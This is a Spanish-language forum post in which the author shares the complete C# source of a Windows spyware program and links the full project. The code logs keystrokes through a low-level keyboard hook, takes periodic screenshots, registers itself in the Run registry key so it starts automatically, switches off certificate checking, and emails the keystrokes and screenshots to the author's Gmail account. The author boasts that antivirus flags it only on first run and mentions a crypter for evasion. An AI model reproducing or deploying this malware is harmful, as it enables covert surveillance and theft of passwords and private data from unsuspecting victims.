estehmm hola :) hace tiempo que queria meterme es el mundillo de la seguridad, y durante estas vacaciones me puse a investigar un poco y salio esto, que quiero compartirlo con ustedes, no es wow la que cosa, pero esta bueno, "saca fotos a la pantalla, capta tus teclas y se inicia automaticamente y te manda el informe al mail" lo unico es que salta el autivirus a la primera que inicia despues ya no jejeje, esta programado en C# y eso :p saludos y buenas noches :)

Ha! estoy subiendo en mega el proyecto entero donde tambien me hice un decodificador para que truduciera todo el codigoque me automande (me lo manda en ASCII al mail)
y tambien otro proyecto de crypter, (encrypta pero despues no se como desencriptar :S) si alguien sabe que lo haga y suba el codigo :P

Este es el link con el proyecto entero esta echo en visual studio
[Enlace externo eliminado para invitados]

Código: Seleccionar todo

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;
using System.IO;
using System.Net;
using System.Net.Mail;
using System.Timers;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Cryptography.X509Certificates;
using System.Net.Security;
using Microsoft.Win32;
using System.Reflection;


namespace UsquedaDos
{
    public partial class ScxV2 : Form
    {
        public ScxV2()
        {
            InitializeComponent();

            _hookID = SetHook(_proc);

            AddStartApp();

            timer1.Interval = 600000;
            timer1.Start();
            timer1.Tick += new EventHandler(TimerEventProcessor);
          
        }

        public void TimerEventProcessor(Object myObject, EventArgs myEventArgs)
        {
            string cuerpo = " ::::::::::::::::::::::::::::::::" + textoASCII;
            SacarFoto();

            MandarMail(cuerpo);
            
        }
            

        #region mandar el mail
        private void MandarMail(string _Cuerpo)
        {
            try
            {       
                var fromAddress = new MailAddress("[email protected]", "zaiop");
                var toAddress = new MailAddress("[email protected]", "zaiop");
                const string fromPassword = "-------PASS";
                const string subject = "blablabla";


                var smtp = new SmtpClient
                {
                    Host = "smtp.gmail.com",
                    Port = 587,
                    EnableSsl = true,
                    DeliveryMethod = SmtpDeliveryMethod.Network,
                    UseDefaultCredentials = false,
                    Credentials = new NetworkCredential(fromAddress.Address, fromPassword)
                };

                ServicePointManager.ServerCertificateValidationCallback =

             delegate(object s

                 , X509Certificate certificate

                 , X509Chain chain

                 , SslPolicyErrors sslPolicyErrors)

             { return true; };

                var message = new MailMessage(fromAddress, toAddress);
                message.Subject = subject;
                message.Body = _Cuerpo;
                message.Attachments.Add(new Attachment(@"C:\\Users\\Public\\Pictures\\fotopantalla.gif"));               

                smtp.Send(message);

            }
            catch (Exception)
            {

            }
           
        }              
       
        #endregion

        #region saca y elimina las imagenes Capturadas

        private static void SacarFoto()
        {
            var imagen = CaptureScreen.GetDesktopImage();
            Bitmap bmp3 = imagen;       
            try
            {
                bmp3.Save("C:\\Users\\Public\\Pictures\\fotopantalla.gif", System.Drawing.Imaging.ImageFormat.Gif);
                bmp3.Dispose();
            }
            catch (Exception )
            {                         
            }
        }      

        private static void EliminaLaFoto()
        {
            try
            {
                if (System.IO.File.Exists(@"C:\\Users\\Public\\Pictures\\fotopantalla.gif"))
                {
                    File.Delete(@"C:\\Users\\Public\\Pictures\\fotopantalla.gif");
                }
            }
            catch (Exception )
            {                   
            }          
        }
        #endregion

        #region CapturarPantalla

        /// <summary>
        /// This class shall keep the GDI32 APIs used in our program.
        /// </summary>
        public class PlatformInvokeGDI32
        {
            #region Class Variables
            public const int SRCCOPY = 13369376;
            #endregion
            #region Class Functions<br>
            [DllImport("gdi32.dll", EntryPoint = "DeleteDC")]
            public static extern IntPtr DeleteDC(IntPtr hDc);

            [DllImport("gdi32.dll", EntryPoint = "DeleteObject")]
            public static extern IntPtr DeleteObject(IntPtr hDc);

            [DllImport("gdi32.dll", EntryPoint = "BitBlt")]
            public static extern bool BitBlt(IntPtr hdcDest, int xDest,
                int yDest, int wDest, int hDest, IntPtr hdcSource,
                int xSrc, int ySrc, int RasterOp);

            [DllImport("gdi32.dll", EntryPoint = "CreateCompatibleBitmap")]
            public static extern IntPtr CreateCompatibleBitmap(IntPtr hdc,
                int nWidth, int nHeight);

            [DllImport("gdi32.dll", EntryPoint = "CreateCompatibleDC")]
            public static extern IntPtr CreateCompatibleDC(IntPtr hdc);

            [DllImport("gdi32.dll", EntryPoint = "SelectObject")]
            public static extern IntPtr SelectObject(IntPtr hdc, IntPtr bmp);
            #endregion


        }

        /// <summary>
        /// This class shall keep the User32 APIs used in our program.
        /// </summary>
        public class PlatformInvokeUSER32
        {
            #region Class Variables
            public const int SM_CXSCREEN = 0;
            public const int SM_CYSCREEN = 1;
            #endregion

            #region Class Functions
            [DllImport("user32.dll", EntryPoint = "GetDesktopWindow")]
            public static extern IntPtr GetDesktopWindow();

            [DllImport("user32.dll", EntryPoint = "GetDC")]
            public static extern IntPtr GetDC(IntPtr ptr);

            [DllImport("user32.dll", EntryPoint = "GetSystemMetrics")]
            public static extern int GetSystemMetrics(int abc);

            [DllImport("user32.dll", EntryPoint = "GetWindowDC")]
            public static extern IntPtr GetWindowDC(Int32 ptr);

            [DllImport("user32.dll", EntryPoint = "ReleaseDC")]
            public static extern IntPtr ReleaseDC(IntPtr hWnd, IntPtr hDc);

            #endregion
        }

        /// <summary>
        /// This class shall keep all the functionality 
        /// for capturing the desktop.
        /// </summary>


        //This structure shall be used to keep the size of the screen.
        public struct SIZE
        {
            public int cx;
            public int cy;
        }

        ///
        /// This class shall keep all the functionality for capturing
        /// the desktop.
        ///
        public class CaptureScreen
        {
            #region Public Class Functions
            public static Bitmap GetDesktopImage()
            {
                //In size variable we shall keep the size of the screen.
                SIZE size;

                //Variable to keep the handle to bitmap.
                IntPtr hBitmap;

                //Here we get the handle to the desktop device context.
                IntPtr hDC = PlatformInvokeUSER32.GetDC
                              (PlatformInvokeUSER32.GetDesktopWindow());

                //Here we make a compatible device context in memory for screen
                //device context.
                IntPtr hMemDC = PlatformInvokeGDI32.CreateCompatibleDC(hDC);

                //We pass SM_CXSCREEN constant to GetSystemMetrics to get the
                //X coordinates of the screen.
                size.cx = PlatformInvokeUSER32.GetSystemMetrics
                          (PlatformInvokeUSER32.SM_CXSCREEN);

                //We pass SM_CYSCREEN constant to GetSystemMetrics to get the
                //Y coordinates of the screen.
                size.cy = PlatformInvokeUSER32.GetSystemMetrics
                          (PlatformInvokeUSER32.SM_CYSCREEN);

                //We create a compatible bitmap of the screen size and using
                //the screen device context.
                hBitmap = PlatformInvokeGDI32.CreateCompatibleBitmap
                            (hDC, size.cx, size.cy);

                //As hBitmap is IntPtr, we cannot check it against null.
                //For this purpose, IntPtr.Zero is used.
                if (hBitmap != IntPtr.Zero)
                {
                    //Here we select the compatible bitmap in the memeory device
                    //context and keep the refrence to the old bitmap.
                    IntPtr hOld = (IntPtr)PlatformInvokeGDI32.SelectObject
                                           (hMemDC, hBitmap);
                    //We copy the Bitmap to the memory device context.
                    PlatformInvokeGDI32.BitBlt(hMemDC, 0, 0, size.cx, size.cy, hDC,
                                               0, 0, PlatformInvokeGDI32.SRCCOPY);
                    //We select the old bitmap back to the memory device context.
                    PlatformInvokeGDI32.SelectObject(hMemDC, hOld);
                    //We delete the memory device context.
                    PlatformInvokeGDI32.DeleteDC(hMemDC);
                    //We release the screen device context.
                    PlatformInvokeUSER32.ReleaseDC(PlatformInvokeUSER32.
                                                   GetDesktopWindow(), hDC);
                    //Image is created by Image bitmap handle and stored in
                    //local variable.
                    Bitmap bmp = System.Drawing.Image.FromHbitmap(hBitmap);
                    //Release the memory to avoid memory leaks.
                    PlatformInvokeGDI32.DeleteObject(hBitmap);
                    //This statement runs the garbage collector manually.
                    GC.Collect();
                    //Return the bitmap 
                    return bmp;
                }
                //If hBitmap is null, retun null.
                return null;
            }
            #endregion
        }

        #endregion

        #region  teclas del sistema
        private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
        public static string textoASCII = string.Empty;


        private const int WH_KEYBOARD_LL = 13;
        private const int WM_KEYDOWN = 0x0100;
        private const int WM_SYSKEYDOWN = 0x0104;
        private static LowLevelKeyboardProc _proc = HookCallback;
        private static IntPtr _hookID = IntPtr.Zero;


        private static IntPtr SetHook(LowLevelKeyboardProc proc)
        {


            using (Process curProcess = Process.GetCurrentProcess())
            using (ProcessModule curModule = curProcess.MainModule)
            {
                return SetWindowsHookEx(WH_KEYBOARD_LL, proc,
                    GetModuleHandle(curModule.ModuleName), 0);
            }

        }

        private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
        {

            if (nCode >= 0 && (wParam == (IntPtr)WM_KEYDOWN || wParam == (IntPtr)WM_SYSKEYDOWN))
            //if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
            {
                int vkCode = Marshal.ReadInt32(lParam);
                textoASCII += "-" + vkCode.ToString();
                //if (Keys.C == (Keys)vkCode && Keys.Control == Control.ModifierKeys)
                //verifico que se presione CTRL + F1:
                if (Keys.F1 == (Keys)vkCode && Keys.Control == Control.ModifierKeys)
                    Console.WriteLine((Keys)vkCode);
            }

            return CallNextHookEx(_hookID, nCode, wParam, lParam);
        }


        #region DllImport

        [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        private static extern IntPtr SetWindowsHookEx(int idHook,
            LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);

        [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool UnhookWindowsHookEx(IntPtr hhk);

        [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode,
            IntPtr wParam, IntPtr lParam);

        [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        private static extern IntPtr GetModuleHandle(string lpModuleName);



        #endregion



        #endregion

        #region inicia automaticamente
        public static void AddStartApp()
        {
            Assembly assem = Assembly.GetExecutingAssembly();
            string localizacion = "@";
            localizacion += assem.Location;

            RegistryKey objKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
            objKey.SetValue("UsquedaDos", localizacion);
            objKey.Close();
        }
        #endregion


    }
}
Responder

Volver a “Fuentes”